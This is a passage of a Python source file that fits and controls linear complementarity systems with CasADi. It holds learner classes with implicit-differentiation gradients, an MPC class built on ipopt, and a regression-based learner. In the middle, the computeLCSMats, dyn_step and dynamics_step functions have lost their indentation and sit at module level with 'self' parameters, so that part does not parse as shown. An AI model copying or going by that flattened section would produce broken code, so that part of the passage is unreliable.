            self.theta += [vec(self.B)]
        else:
            self.B = DM(B)
        if C is None:
            self.C = SX.sym('C', self.n_state, self.n_lam)
            self.theta += [vec(self.C)]
        else:
            self.C = DM(C)
        if D is None:
            self.D = SX.sym('D', self.n_lam, self.n_state)
            self.theta += [vec(self.D)]
        else:
            self.D = DM(D)
        if E is None:
            self.E = SX.sym('E', self.n_lam, self.n_control)
            self.theta += [vec(self.E)]
        else:
            self.E = DM(E)
        if G is None:
            self.G = SX.sym('G', self.n_lam, self.n_lam)
            self.theta += [vec(self.G)]
        else:
            self.G = DM(G)
        if H is None:
            self.H = SX.sym('H', self.n_lam, self.n_lam)
            self.theta += [vec(self.H)]
        else:
            self.H = DM(H)
        if lcp_offset is None:
            self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
            self.theta += [vec(self.lcp_offset)]
        else:
            self.lcp_offset = DM(lcp_offset)
        # Flatten the parameter list into one symbolic vector.
        self.theta = vcat(self.theta)
        self.n_theta = self.theta.numel()
        # F is parameterized as a PSD part (G@G.T) plus a skew part (H - H.T).
        self.F = stiffness * np.eye(self.n_lam) + self.G @ self.G.T + self.H - self.H.T
        # Accessor functions mapping a theta value to each matrix.
        self.F_fn = Function('F_fn', [self.theta], [self.F])
        self.D_fn = Function('D_fn', [self.theta], [self.D])
        self.E_fn = Function('E_fn', [self.theta], [self.E])
        self.G_fn = Function('G_fn', [self.theta], [self.G])
        self.H_fn = Function('H_fn', [self.theta], [self.H])
        self.A_fn = Function('A_fn', [self.theta], [self.A])
        self.B_fn = Function('B_fn', [self.theta], [self.B])
        self.C_fn = Function('C_fn', [self.theta], [self.C])
        self.lcp_offset_fn = Function('lcp_offset_fn', [self.theta], [self.lcp_offset])
        # self.dyn_offset_fn = Function('dyn_offset_fn', [self.theta], [self.dyn_offset])

    def differetiable(self, gamma=1e-3, epsilon=0.5):
        """Build the inner QP, the loss functions, and their derivatives w.r.t. theta.

        NOTE: the method name keeps the original spelling ("differetiable")
        for interface compatibility.

        gamma penalizes the gap between the slack phi and the LCP distance;
        epsilon weights the lcp loss against the dynamics loss.
        """
        # define the dynamics loss
        self.x_next = SX.sym('x_next', self.n_state)
        data = vertcat(self.x, self.u, self.x_next)
        # self.dyn = self.A @ self.x + self.B @ self.u + self.C @ self.lam + self.dyn_offset
        self.dyn = self.A @ self.x + self.B @ self.u + self.C @ self.lam
        dyn_loss = dot(self.dyn - self.x_next, self.dyn - self.x_next)
        # lcp loss: lam'phi plus a quadratic penalty tying phi to the LCP distance
        self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
        self.phi = SX.sym('phi', self.n_lam)
        lcp_loss = dot(self.lam, self.phi) + 1 / gamma * dot(self.phi - self.dist,
                                                             self.phi - self.dist)
        # total loss
        # loss = (1 - epsilon) * dyn_loss + epsilon * lcp_loss
        # (removed a dead expression here: `dyn_loss + lcp_loss / epsilon` was
        # computed and discarded — it had no effect on the loss actually used)
        loss = dot(self.dyn[2:4] - self.x_next[2:4], self.dyn[2:4] - self.x_next[2:4]) + lcp_loss / epsilon
        # loss = (dyn_loss + lcp_loss / epsilon) / (0.5+dot(self.x_next, self.x_next))
        # establish the qp solver over (lam, phi) with (x, u, x_next, theta) as parameters
        lam_phi = vertcat(self.lam, self.phi)
        data_theta = vertcat(self.x, self.u, self.x_next, self.theta)
        quadprog = {'x': vertcat(self.lam, self.phi), 'f': loss, 'p': data_theta}
        opts = {'printLevel': 'none', }
        self.inner_QPSolver = qpsol('inner_QPSolver', 'qpoases', quadprog, opts)
        # compute the jacobian from lam to theta
        self.loss_fn = Function('loss_fn', [data, self.theta, lam_phi], [loss])
        self.dloss_fn = Function('dloss_fn', [data, self.theta, lam_phi], [jacobian(loss, self.theta).T])
        self.dyn_loss_fn = Function('dyn_loss_fn', [data, self.theta, lam_phi], [dyn_loss])
        self.lcp_loss_fn = Function('lcp_loss_fn', [data, self.theta, lam_phi], [lcp_loss])
        # stationarity-style map L = diag(lam_phi) * grad(loss); implicit
        # differentiation below yields dsol/dtheta
        grad_loss = jacobian(loss, lam_phi).T
        L = diag(lam_phi) @ grad_loss
        self.L_fn = Function('L_fn', [data, self.theta, lam_phi], [L])  # this is just for testing
        # compute the gradient of lam_phi_opt with respect to theta (implicit function theorem)
        dL_dsol = jacobian(L, lam_phi)
        dL_dtheta = jacobian(L, self.theta)
        dsol_dtheta = -inv(dL_dsol) @ dL_dtheta
        self.dsol_dtheta_fn = Function('dsol_dtheta_fn', [data, self.theta, lam_phi], [dsol_dtheta])
        # this is just for testing: total derivative including the solution path
        dloss2 = jacobian(loss, self.theta) + jacobian(loss, lam_phi) @ dsol_dtheta
        self.dloss2_fn = Function('dloss2_fn', [data, self.theta, lam_phi], [dloss2.T])
        # compute the second order derivative (Gauss-Newton-like total Hessian)
        dloss_dtheta = jacobian(loss, self.theta).T
        ddloss = jacobian(dloss_dtheta, self.theta) + jacobian(dloss_dtheta, lam_phi) @ dsol_dtheta
        self.ddloss_fn = Function('ddloss_fn', [data, self.theta, lam_phi], [ddloss])

    def compute_lambda(self, x_batch, u_batch, x_next_batch, theta_val):
        """Solve the inner QP at theta_val for each sample.

        Returns (lam_phi_opt_batch, loss_opt_batch), one row/entry per sample.
        Requires ``differetiable()`` to have been called first.
        """
        # prepare the data: one column per sample, theta tiled across the batch
        batch_size = x_batch.shape[0]
        data_batch = np.hstack((x_batch, u_batch, x_next_batch))
        theta_val_batch = np.tile(theta_val, (batch_size, 1))
        data_theta_batch = np.hstack((data_batch, theta_val_batch))
        # compute the lam_phi solution (lbx=0 enforces lam, phi >= 0)
        sol_batch = self.inner_QPSolver(lbx=0.0, p=data_theta_batch.T)
        loss_opt_batch = sol_batch['f'].full().flatten()
        lam_phi_opt_batch = sol_batch['x'].full().T
        return lam_phi_opt_batch, loss_opt_batch

    def gradient_step(self, x_batch, u_batch, x_next_batch, theta_val, lam_phi_opt_batch, second_order=False):
        """Evaluate batch-mean gradient and losses at theta_val.

        Returns (dtheta_mean, loss_mean, dyn_loss_mean, lcp_loss_mean, dtheta_hessian)
        where dtheta_hessian is the damped-Newton direction when second_order is
        True, otherwise just a copy of the plain gradient.
        """
        batch_size = x_batch.shape[0]
        data_batch = np.hstack((x_batch, u_batch, x_next_batch))
        theta_val_batch = np.tile(theta_val, (batch_size, 1))
        # compute the gradient value (mean over the batch)
        dtheta_batch = self.dloss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
        dtheta_mean = dtheta_batch.full().mean(axis=1)
        # compute the losses
        loss_batch = self.loss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
        dyn_loss_batch = self.dyn_loss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
        lcp_loss_batch = self.lcp_loss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
        loss_mean = loss_batch.full().mean()
        dyn_loss_mean = dyn_loss_batch.full().mean()
        lcp_loss_mean = lcp_loss_batch.full().mean()
        dtheta_hessian = dtheta_mean
        if second_order is True:
            # ddloss_fn stacks per-sample Hessians side by side; slice them apart
            hessian_batch = self.ddloss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
            # compute the mean hessian
            hessian_sum = 0
            for i in range(batch_size):
                hessian_i = hessian_batch[:, i * self.n_theta:(i + 1) * self.n_theta]
                hessian_sum += hessian_i
            hessian_mean = hessian_sum / batch_size
            # damp the singular values so the Hessian is safely invertible
            damping_factor = 1
            u, s, vh = np.linalg.svd(hessian_mean)
            s = s + damping_factor
            damped_hessian = u @ np.diag(s) @ vh
            dtheta_hessian = (inv(damped_hessian) @ DM(dtheta_mean)).full().flatten()
        return dtheta_mean, loss_mean, dyn_loss_mean, lcp_loss_mean, dtheta_hessian

    def dyn_prediction(self, x_batch, u_batch, theta_val):
        """Predict next states at theta_val by solving the LCP then applying the dynamics.

        Returns (x_next_batch, lam_opt_batch), one row per sample.
        """
        # rebuild the symbolic graph so self.dist/self.dyn exist
        self.differetiable()
        batch_size = x_batch.shape[0]
        theta_val_batch = np.tile(theta_val, (batch_size, 1))
        xu_theta_batch = np.hstack((x_batch, u_batch, theta_val_batch))
        # establish the lcp solver: min lam'dist s.t. lam >= 0, dist >= 0
        lcp_loss = dot(self.dist, self.lam)
        xu_theta = vertcat(self.x, self.u, self.theta)
        quadprog = {'x': self.lam, 'f': lcp_loss, 'g': self.dist, 'p': xu_theta}
        opts = {'printLevel': 'none'}
        lcp_Solver = qpsol('lcp_solver', 'qpoases', quadprog, opts)
        self.lcp_fn = Function('dist_fn', [self.x, self.u, self.lam, self.theta], [self.dist, dot(self.dist, self.lam)])
        self.lcp_dist_fn = Function('dist_fn', [self.x, self.u, self.lam, self.theta], [self.dist])
        # establish the dynamics equation
        dyn_fn = Function('dyn_fn', [self.x, self.u, self.lam, self.theta], [self.dyn])
        # compute the lam_batch
        sol_batch = lcp_Solver(lbx=0., lbg=0., p=xu_theta_batch.T)
        lam_opt_batch = sol_batch['x'].full().T
        # compute the next state batch
        x_next_batch = dyn_fn(x_batch.T, u_batch.T, lam_opt_batch.T, theta_val_batch.T).full().T
        return x_next_batch, lam_opt_batch
# class for using a lcs to do mpc control
class LCS_MPC:
    """MPC controller for a fixed (non-learned) Linear Complementarity System.

    All system matrices are given numerically. ``forward`` simulates one step
    by solving the LCP for lam; ``oc_setup``/``mpc`` transcribe and solve a
    finite-horizon optimal control problem with the complementarity
    conditions as NLP constraints.

    NOTE(review): this class uses ``casadi.MX`` / ``casadi.vertcat`` etc.,
    which requires the module name ``casadi`` to be bound — only
    ``from casadi import *`` is visible at the top of this file; confirm
    ``import casadi`` exists somewhere.
    """

    def __init__(self, A, B, C, D, E, F, lcp_offset):
        self.A = DM(A)
        self.B = DM(B)
        self.C = DM(C)
        self.D = DM(D)
        self.E = DM(E)
        self.F = DM(F)
        self.lcp_offset = DM(lcp_offset)
        # dimensions inferred from the matrices
        self.n_state = self.A.shape[0]
        self.n_control = self.B.shape[1]
        self.n_lam = self.C.shape[1]
        # define the system variable
        x = casadi.MX.sym('x', self.n_state)
        u = casadi.MX.sym('u', self.n_control)
        xu_pair = vertcat(x, u)
        lam = casadi.MX.sym('lam', self.n_lam)
        # dynamics: x_next = A x + B u + C lam
        dyn = self.A @ x + self.B @ u + self.C @ lam
        self.dyn_fn = Function('dyn_fn', [xu_pair, lam], [dyn])
        # loss function: complementarity product lam'(Dx + Eu + F lam + offset)
        lcp_loss = dot(self.D @ x + self.E @ u + self.F @ lam + self.lcp_offset, lam)
        # constraints: both the LCP distance and lam must be nonnegative
        dis_cstr = self.D @ x + self.E @ u + self.F @ lam + self.lcp_offset
        lam_cstr = lam
        total_cstr = vertcat(dis_cstr, lam_cstr)
        self.dis_cstr_fn = Function('dis_cstr_fn', [lam, xu_pair], [dis_cstr])
        # establish the qp solver to solve for LCP
        quadprog = {'x': lam, 'f': lcp_loss, 'g': total_cstr, 'p': xu_pair}
        opts = {'printLevel': 'none', }
        self.lcpSolver = qpsol('S', 'qpoases', quadprog, opts)

    def forward(self, x_t, u_t):
        """Simulate one step: solve the LCP for lam_t, then apply the dynamics.

        Returns (x_next, lam_t) as flat numpy arrays.
        """
        xu_pair = vertcat(DM(x_t), DM(u_t))
        sol = self.lcpSolver(p=xu_pair, lbg=0.)
        lam_t = sol['x'].full().flatten()
        x_next = self.dyn_fn(xu_pair, lam_t).full().flatten()
        return x_next, lam_t

    def oc_setup(self, mpc_horizon):
        """Transcribe the horizon-``mpc_horizon`` OC problem into an ipopt NLP.

        Cost matrices Q, R, QN are NLP parameters, so the same solver object
        can be reused with different weights in ``mpc``. Decision variables
        per stage are (X_k, U_k, Lam_k); complementarity is imposed as
        dist >= 0 together with dot(dist, lam) == 0.
        """
        self.mpc_horizon = mpc_horizon
        # set the cost function parameters (symbolic -> passed as p at solve time)
        Q = MX.sym('Q', self.n_state, self.n_state)
        R = MX.sym('R', self.n_control, self.n_control)
        QN = MX.sym('QN', self.n_state, self.n_state)
        # define the parameters
        oc_parameters = vertcat(vec(Q), vec(R), vec(QN))
        # Start with an empty NLP
        w = []        # decision variables
        w0 = []       # initial guess
        lbw = []      # variable lower bounds
        ubw = []      # variable upper bounds
        J = 0         # accumulated cost
        g = []        # constraints
        lbg = []
        ubg = []
        # "Lift" initial conditions; bounds are overwritten with the actual
        # initial state inside mpc()
        Xk = casadi.MX.sym('X0', self.n_state)
        w += [Xk]
        lbw += np.zeros(self.n_state).tolist()
        ubw += np.zeros(self.n_state).tolist()
        w0 += np.zeros(self.n_state).tolist()
        # formulate the NLP
        for k in range(self.mpc_horizon):
            # New NLP variable for the control
            Uk = casadi.MX.sym('U_' + str(k), self.n_control)
            w += [Uk]
            lbw += self.n_control * [-inf]
            ubw += self.n_control * [inf]
            w0 += self.n_control * [0.]
            # new NLP variable for the complementarity variable
            Lamk = casadi.MX.sym('lam' + str(k), self.n_lam)
            w += [Lamk]
            lbw += self.n_lam * [0.]
            ubw += self.n_lam * [inf]
            w0 += self.n_lam * [0.]
            # Add complementarity equation: distance >= 0 and dot(dist, lam) == 0
            g += [self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset]
            lbg += self.n_lam * [0.]
            ubg += self.n_lam * [inf]
            g += [casadi.dot(self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset, Lamk)]
            lbg += [0.]
            ubg += [0.]
            # Integrate till the end of the interval
            Xnext = self.A @ Xk + self.B @ Uk + self.C @ Lamk
            Ck = dot(Xk, Q @ Xk) + dot(Uk, R @ Uk)
            J = J + Ck
            # New NLP variable for state at end of interval
            Xk = casadi.MX.sym('X_' + str(k + 1), self.n_state)
            w += [Xk]
            lbw += self.n_state * [-inf]
            ubw += self.n_state * [inf]
            w0 += self.n_state * [0.]
            # Add constraint for the dynamics (multiple-shooting defect)
            g += [Xnext - Xk]
            lbg += self.n_state * [0.]
            ubg += self.n_state * [0.]
        # Add the final cost
        J = J + dot(Xk, QN @ Xk)
        # Create an NLP solver and solve
        opts = {'ipopt.print_level': 0, 'ipopt.sb': 'yes', 'print_time': 0}
        prob = {'f': J, 'x': casadi.vertcat(*w), 'g': casadi.vertcat(*g), 'p': oc_parameters}
        self.solver = casadi.nlpsol('solver', 'ipopt', prob, opts)
        self.lbw = DM(lbw)
        self.ubw = DM(ubw)
        self.lbg = DM(lbg)
        self.ubg = DM(ubg)
        self.w0 = DM(w0)

    def mpc(self, init_state, mat_Q, mat_R, mat_QN, init_guess=None):
        """Solve the transcribed OC problem from init_state with the given weights.

        init_guess, if given, is a previous solve's result dict (warm start).
        Returns a dict with state/control/lam trajectories, the raw solution
        vector ('w_opt') and the optimal cost. Requires ``oc_setup`` first.
        """
        if init_guess is not None:
            self.w0 = init_guess['w_opt']
        # construct the parameter vector
        oc_parameters = vertcat(vec(mat_Q), vec(mat_R), vec(mat_QN))
        # pin the first state variable to the measured initial state
        self.lbw[0:self.n_state] = DM(init_state)
        self.ubw[0:self.n_state] = DM(init_state)
        self.w0[0:self.n_state] = DM(init_state)
        # Solve the NLP
        sol = self.solver(x0=self.w0, lbx=self.lbw, ubx=self.ubw, lbg=self.lbg, ubg=self.ubg, p=oc_parameters)
        w_opt = sol['x']
        cost_opt = sol['f']
        # extract the optimal control and state: reshape the stage variables
        # into columns of (state, control, lam), then append the final state
        sol_traj = w_opt[0:self.mpc_horizon * (self.n_state + self.n_control + self.n_lam)].reshape(
            (self.n_state + self.n_control + self.n_lam, -1))
        x_traj = casadi.horzcat(sol_traj[0:self.n_state, :],
                                w_opt[self.mpc_horizon * (self.n_state + self.n_control + self.n_lam):]).T
        u_traj = sol_traj[self.n_state:self.n_state + self.n_control, :].T
        lam_traj = sol_traj[self.n_state + self.n_control:, :].T
        opt_sol = {'state_traj_opt': x_traj.full(),
                   'control_traj_opt': u_traj.full(),
                   'lam_traj_opt': lam_traj.full(),
                   'w_opt': w_opt,
                   'cost_opt': cost_opt,
                   }
        return opt_sol
# class for learning LCS from the hybrid data
class LCS_learner_regression:
    """LCS learner that alternates LCP gradient steps with dynamics regression.

    The parameter vector is split: ``lcp_theta`` holds (D, E, G, H,
    lcp_offset) and is updated by gradient (``gradient_step``), while
    ``dyn_theta`` holds (A, B, C) and is fit in closed form by least squares
    (``dyn_regression``). Matrices given numerically are frozen as DM.
    F = stiffness*I + G@G.T + (H - H.T) as in the other learners.
    """

    def __init__(self, n_state, n_control, n_lam,
                 A=None, B=None, C=None, D=None, E=None, G=None, H=None, lcp_offset=None,
                 stiffness=0.):
        self.n_lam = n_lam
        self.n_state = n_state
        self.n_control = n_control
        # Symbolic variables for the complementarity variable, state and control.
        self.lam = SX.sym('lam', self.n_lam)
        self.x = SX.sym('x', self.n_state)
        self.u = SX.sym('u', self.n_control)
        # theta = all free parameters; lcp_theta / dyn_theta are the two sub-groups
        self.theta = []
        self.lcp_theta = []
        self.dyn_theta = []
        if A is None:
            self.A = SX.sym('A', self.n_state, self.n_state)
            self.theta += [vec(self.A)]
            self.dyn_theta += [vec(self.A)]
        else:
            self.A = DM(A)
        if B is None:
            self.B = SX.sym('B', self.n_state, self.n_control)
            self.theta += [vec(self.B)]
            self.dyn_theta += [vec(self.B)]
        else:
            self.B = DM(B)
        if C is None:
            self.C = SX.sym('C', self.n_state, self.n_lam)
            self.theta += [vec(self.C)]
            self.dyn_theta += [vec(self.C)]
        else:
            self.C = DM(C)
        if D is None:
            self.D = SX.sym('D', self.n_lam, self.n_state)
            self.theta += [vec(self.D)]
            self.lcp_theta += [vec(self.D)]
        else:
            self.D = DM(D)
        if E is None:
            self.E = SX.sym('E', self.n_lam, self.n_control)
            self.theta += [vec(self.E)]
            self.lcp_theta += [vec(self.E)]
        else:
            self.E = DM(E)
        if G is None:
            self.G = SX.sym('G', self.n_lam, self.n_lam)
            self.theta += [vec(self.G)]
            self.lcp_theta += [vec(self.G)]
        else:
            self.G = DM(G)
        if H is None:
            self.H = SX.sym('H', self.n_lam, self.n_lam)
            self.theta += [vec(self.H)]
            self.lcp_theta += [vec(self.H)]
        else:
            self.H = DM(H)
        if lcp_offset is None:
            self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
            self.theta += [vec(self.lcp_offset)]
            self.lcp_theta += [vec(self.lcp_offset)]
        else:
            self.lcp_offset = DM(lcp_offset)
        # Flatten the parameter groups into symbolic vectors.
        self.theta = vcat(self.theta)
        self.lcp_theta = vcat(self.lcp_theta)
        self.dyn_theta = vcat(self.dyn_theta)
        self.n_theta = self.theta.numel()
        self.n_lcp_theta = self.lcp_theta.numel()
        self.n_dyn_theta = self.dyn_theta.numel()
        # F parameterized as PSD part (G@G.T) plus skew part (H - H.T).
        self.F = stiffness * np.eye(self.n_lam) + self.G @ self.G.T + self.H - self.H.T
        # Accessor functions: LCP matrices keyed on lcp_theta, dynamics on dyn_theta.
        self.F_fn = Function('F_fn', [self.lcp_theta], [self.F])
        self.D_fn = Function('D_fn', [self.lcp_theta], [self.D])
        self.E_fn = Function('E_fn', [self.lcp_theta], [self.E])
        self.G_fn = Function('G_fn', [self.lcp_theta], [self.G])
        self.H_fn = Function('H_fn', [self.lcp_theta], [self.H])
        self.A_fn = Function('A_fn', [self.dyn_theta], [self.A])
        self.B_fn = Function('B_fn', [self.dyn_theta], [self.B])
        self.C_fn = Function('C_fn', [self.dyn_theta], [self.C])
        self.lcp_offset_fn = Function('lcp_offset_fn', [self.lcp_theta], [self.lcp_offset])
        # random initialization of both parameter groups
        self.val_lcp_theta = 0.1 * np.random.randn(self.n_lcp_theta)
        self.val_dyn_theta = 0.1 * np.random.randn(self.n_dyn_theta)

    def differetiable(self):
        """Build the LCP solver, dynamics function, and the gradient of the
        dynamics loss w.r.t. lcp_theta through the LCP solution.

        NOTE: the method name keeps the original spelling ("differetiable")
        for interface compatibility.
        """
        # lcp loss: solve min lam'dist s.t. lam >= 0, dist >= 0
        self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
        lcp_data_theta = vertcat(self.x, self.u, self.lcp_theta)
        self.lcp_loss = dot(self.dist, self.lam)
        quadprog = {'x': self.lam, 'f': self.lcp_loss, 'g': self.dist, 'p': lcp_data_theta}
        opts = {'printLevel': 'none', }
        self.lcp_Solver = qpsol('lcp_Solver', 'qpoases', quadprog, opts)
        # define the dynamics loss
        self.x_next = SX.sym('x_next', self.n_state)
        data = vertcat(self.x, self.u, self.x_next)
        self.dyn = self.A @ self.x + self.B @ self.u + self.C @ self.lam
        self.dyn_loss = dot(self.dyn - self.x_next, self.dyn - self.x_next)
        self.dyn_fn = Function('dyn_fn', [self.x, self.u, self.lam, self.dyn_theta], [self.dyn])
        # define the dynamics loss with respect to the lam variable
        self.dloss_dlam = jacobian(self.dyn_loss, self.lam)
        # define the gradient of lam with respect to lcp_theta via implicit
        # differentiation of the complementarity map g = diag(lam) * dist
        g = diag(self.lam) @ self.dist
        dg_dlam = jacobian(g, self.lam)
        dg_dlcp = jacobian(g, self.lcp_theta)
        self.dlam_dlcp = -inv(dg_dlam) @ dg_dlcp
        # chain rule: d(dyn_loss)/d(lcp_theta) through the LCP solution
        self.dloss_dlcp = (self.dloss_dlam @ self.dlam_dlcp).T
        # assemble functions
        data = vertcat(self.x, self.u, self.x_next)
        self.dloss_dlcp_fn = Function('dloss_dlcp_fn', [data, self.lam, self.dyn_theta, self.lcp_theta],
                                      [self.dloss_dlcp])

    def compute_lambda(self, x_batch, u_batch):
        """Solve the LCP per sample at the current val_lcp_theta.

        Returns (lam_opt_batch, lcp_loss_opt_batch), one row/entry per sample.
        """
        self.differetiable()
        # prepare the data: one column per sample, lcp_theta tiled across the batch
        batch_size = x_batch.shape[0]
        lcp_data_batch = np.hstack((x_batch, u_batch))
        lcp_theta_batch = np.tile(self.val_lcp_theta, (batch_size, 1))
        lcp_data_theta_batch = np.hstack((lcp_data_batch, lcp_theta_batch))
        # compute the lam solution
        sol_batch = self.lcp_Solver(lbx=0.0, lbg=0.0, p=lcp_data_theta_batch.T)
        lcp_loss_opt_batch = sol_batch['f'].full().flatten()
        lam_opt_batch = sol_batch['x'].full().T
        return lam_opt_batch, lcp_loss_opt_batch

    def dyn_regression(self, x_batch, u_batch, lam_opt_batch, x_next_batch):
        """Fit (A, B, C) in closed form by least squares and store the result
        in self.val_dyn_theta; return the mean dynamics residual.

        Uses the vec identity vec(AX) = (X' kron I) vec(A) to build a linear
        system mat_A @ dyn_theta = vec(x_next).
        """
        # prepare the data
        batch_size = x_batch.shape[0]
        I = np.eye(self.n_state)
        kron_x = np.kron(x_batch, I)
        kron_u = np.kron(u_batch, I)
        kron_lam_opt = np.kron(lam_opt_batch, I)
        kron_x_next = x_next_batch.flatten()
        mat_A = np.hstack((kron_x, kron_u, kron_lam_opt))
        vec_b = kron_x_next
        # do the regression for dyn_theta (normal equations; assumes mat_A'mat_A
        # is invertible — TODO confirm batch is rich enough)
        dyn_theta_opt = inv(mat_A.T @ mat_A) @ (mat_A.T @ vec_b)
        dyn_loss_opt = dot(mat_A @ dyn_theta_opt - vec_b, mat_A @ dyn_theta_opt - vec_b) / batch_size
        self.val_dyn_theta = dyn_theta_opt.full().flatten()
        return dyn_loss_opt

    def gradient_step(self, x_batch, u_batch, x_next_batch, lam_opt_batch):
        """Return the batch-mean gradient of the dynamics loss w.r.t. lcp_theta.

        Requires ``differetiable()`` to have been called (it builds dloss_dlcp_fn).
        """
        batch_size = x_batch.shape[0]
        data_batch = np.hstack((x_batch, u_batch, x_next_batch))
        dyn_theta_opt_batch = np.tile(self.val_dyn_theta, (batch_size, 1))
        lcp_theta_batch = np.tile(self.val_lcp_theta, (batch_size, 1))
        # compute the gradient value (mean over the batch)
        dlcp = self.dloss_dlcp_fn(data_batch.T, lam_opt_batch.T, dyn_theta_opt_batch.T, lcp_theta_batch.T)
        dlcp_mean = dlcp.full().mean(axis=1)
        return dlcp_mean.flatten()

    def dyn_prediction(self, x_batch, u_batch):
        """Predict next states: solve the LCP for lam, then apply the learned dynamics.

        Returns (x_next_batch, lam_opt_batch), one row per sample.
        """
        self.differetiable()
        # prepare the data
        batch_size = x_batch.shape[0]
        lcp_data_batch = np.hstack((x_batch, u_batch))
        lcp_theta_batch = np.tile(self.val_lcp_theta, (batch_size, 1))
        lcp_data_theta_batch = np.hstack((lcp_data_batch, lcp_theta_batch))
        # compute the lam solution
        sol_batch = self.lcp_Solver(lbx=0.0, lbg=0.0, p=lcp_data_theta_batch.T)
        lam_opt_batch = sol_batch['x'].full().T
        # compute the next state batch
        dyn_theta_op_batch = np.tile(self.val_dyn_theta, (batch_size, 1))
        x_next_batch = self.dyn_fn(x_batch.T, u_batch.T, lam_opt_batch.T, dyn_theta_op_batch.T).full().T
        return x_next_batch, lam_opt_batch

    def sim_dyn(self, init_x_batch, control_traj_batch):
        """Roll out the learned LCS from each initial state under each control trajectory.

        Returns (state_traj_batch, lam_traj_batch): per sample, a (T+1, n_state)
        state array and a (T, n_lam) lam array, as lists of numpy arrays.
        """
        self.differetiable()
        batch_size = init_x_batch.shape[0]
        state_traj_batch = []
        lam_traj_batch = []
        for i in range(batch_size):
            init_x = init_x_batch[i]
            control_traj = control_traj_batch[i]
            state_traj = [init_x]
            lam_traj = []
            control_horizon = control_traj.shape[0]
            for t in range(control_horizon):
                curr_x = state_traj[-1]
                curr_u = control_traj[t]
                # solve the LCP at the current (x, u) to get lam, then step the dynamics
                curr_lcp_data_theta = np.hstack((curr_x, curr_u, self.val_lcp_theta))
                curr_sol = self.lcp_Solver(lbx=0.0, lbg=0.0, p=curr_lcp_data_theta)
                curr_lam = curr_sol['x'].full().flatten()
                next_x = self.dyn_fn(curr_x, curr_u, curr_lam, self.val_dyn_theta).full().flatten()
                state_traj += [next_x]
                lam_traj += [curr_lam]
            state_traj = np.array(state_traj)
            lam_traj = np.array(lam_traj)
            state_traj_batch += [state_traj]
            lam_traj_batch += [lam_traj]
        return state_traj_batch, lam_traj_batch
def computeLCSMats(self, compact=True):
A = self.A_fn(self.val_dyn_theta).full()
B = self.B_fn(self.val_dyn_theta).full()
C = self.C_fn(self.val_dyn_theta).full()
D = self.D_fn(self.val_lcp_theta).full()
E = self.E_fn(self.val_lcp_theta).full()
F = self.F_fn(self.val_lcp_theta).full()
G = self.G_fn(self.val_lcp_theta).full()
H = self.H_fn(self.val_lcp_theta).full()
lcp_offset = self.lcp_offset_fn(self.val_lcp_theta).full()
lcs_theta = vertcat(vec(A), vec(B), vec(C),
vec(D), vec(E), vec(F),
vec(lcp_offset))
# return lcs_theta, A, B, C, D, E, F, lcp_offset
if compact is True:
return lcs_theta
else:
return {'A': A,
'B': B,
'C': C,
'D': D,
'E': E,
'F': F,
'G': G,
'H': H,
'lcp_offset': lcp_offset,
}
def dyn_step(self, x_batch, u_batch):
self.differetiable()
if type(x_batch) is np.ndarray:
x_batch = [x_batch]
u_batch = [u_batch]
batch_size = len(x_batch)
next_x_batch = []
lam_batch = []
for i in range(batch_size):
x = x_batch[i]
u = u_batch[i]
lcp_data_theta = np.hstack((x, u, self.val_lcp_theta))
# compute the lam value
sol = self.lcp_Solver(lbx=0.0, lbg=0.0, p=lcp_data_theta)
lam = sol['x'].full().flatten()
# compute the next state
next_x = self.dyn_fn(x, u, lam, self.val_dyn_theta).full().flatten()
# store
next_x_batch += [next_x]
lam_batch += [lam]
return next_x_batch, lam_batch
def dynamics_step(self, curr_x, curr_u):
self.differetiable()
lcp_data_theta = np.hstack((curr_x, curr_u, self.val_lcp_theta))
# compute the lam value
sol = self.lcp_Solver(lbx=0.0, lbg=0.0, p=lcp_data_theta)
curr_lam = sol['x'].full().flatten()
# compute the next state
next_x = self.dyn_fn(curr_x, curr_u, curr_lam, self.val_dyn_theta).full().flatten()
return next_x, curr_lam
# class for learning LCS from the hybrid data (backup)
class LCS_learner_regression_backup:
    """Backup variant of the regression-based LCS learner.

    Learns a linear complementarity system
        x' = A x + B u + C lam,   0 <= lam  _|_  D x + E u + F lam + lcp_offset >= 0
    where F is parameterized as stiffness*I + G G^T + H - H^T so that its
    symmetric part is positive semidefinite. Unlike the non-backup class,
    the parameter estimates are passed in explicitly instead of being
    stored as attributes.
    """

    def __init__(self, n_state, n_control, n_lam,
                 A=None, B=None, C=None, D=None, E=None, G=None, H=None, lcp_offset=None,
                 stiffness=0.):
        """Set up the symbolic LCS; any matrix given as None becomes learnable.

        Learnable matrices are created as CasADi symbols and collected into
        self.dyn_theta (A, B, C) and self.lcp_theta (D, E, G, H, lcp_offset);
        fixed matrices are wrapped as constant DM values.
        """
        self.n_lam = n_lam
        self.n_state = n_state
        self.n_control = n_control
        self.lam = SX.sym('lam', self.n_lam)
        self.x = SX.sym('x', self.n_state)
        self.u = SX.sym('u', self.n_control)
        self.theta = []
        self.lcp_theta = []
        self.dyn_theta = []
        if A is None:
            self.A = SX.sym('A', self.n_state, self.n_state)
            self.theta += [vec(self.A)]
            self.dyn_theta += [vec(self.A)]
        else:
            self.A = DM(A)
        if B is None:
            self.B = SX.sym('B', self.n_state, self.n_control)
            self.theta += [vec(self.B)]
            self.dyn_theta += [vec(self.B)]
        else:
            self.B = DM(B)
        if C is None:
            self.C = SX.sym('C', self.n_state, self.n_lam)
            self.theta += [vec(self.C)]
            self.dyn_theta += [vec(self.C)]
        else:
            self.C = DM(C)
        if D is None:
            self.D = SX.sym('D', self.n_lam, self.n_state)
            self.theta += [vec(self.D)]
            self.lcp_theta += [vec(self.D)]
        else:
            self.D = DM(D)
        if E is None:
            self.E = SX.sym('E', self.n_lam, self.n_control)
            self.theta += [vec(self.E)]
            self.lcp_theta += [vec(self.E)]
        else:
            self.E = DM(E)
        if G is None:
            self.G = SX.sym('G', self.n_lam, self.n_lam)
            self.theta += [vec(self.G)]
